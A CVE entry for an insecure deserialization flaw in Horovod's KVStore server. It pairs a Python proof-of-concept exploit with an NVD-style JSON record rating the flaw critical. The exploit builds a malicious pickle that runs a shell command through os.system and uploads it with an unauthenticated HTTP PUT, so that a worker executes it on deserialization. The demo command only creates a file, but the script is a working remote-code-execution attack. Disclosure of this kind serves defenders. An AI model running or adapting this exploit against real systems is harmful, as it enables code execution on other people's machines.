CVE-2026-31234

import pickle import os import requests # Target Horovod KVStore URL # CVE-2026-31234: KVStore lacks authentication and allows arbitrary writes target_url = "http://<target-ip>:<port>/kvstore/key" # Generate malicious payload using pickle # This class defines the payload to be executed during deserialization class Exploit: def __reduce__(self): # Command to execute on the victim worker # Example: creating a file or connecting back return (os.system, ('touch /tmp/pwned_by_cve_2026_31234',)) # Serialize the payload malicious_data = pickle.dumps(Exploit()) # Exploit: Send malicious payload via HTTP PUT # The server accepts this data without authentication try: print(f"[*] Sending exploit payload to {target_url}...") response = requests.put(target_url, data=malicious_data) if response.status_code == 200: print("[+] Payload uploaded successfully.") print("[*] Triggering deserialization... wait for a worker to call GET.") else: print(f"[-] Upload failed. Status: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-31234", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.743", "lastModified": "2026-05-14T20:17:02.770", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Horovod thru 0.28.1 contains an insecure deserialization vulnerability (CWE-502) in its KVStore HTTP server component. The KVStore server, used for distributed task coordination, lacks authentication and authorization controls, allowing any remote attacker to write arbitrary data via HTTP PUT requests. When a Horovod worker reads data from the KVStore (via HTTP GET), it deserializes the data using cloudpickle.loads() without verifying its source or integrity. An attacker can exploit this by sending a malicious pickle payload to the server before the legitimate data is written, causing the victim worker to deserialize and execute arbitrary code, leading to remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/horovod/horovod", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31234-35d1e139318881d585cde508b9d2453c", "source": "[email protected]"}]}}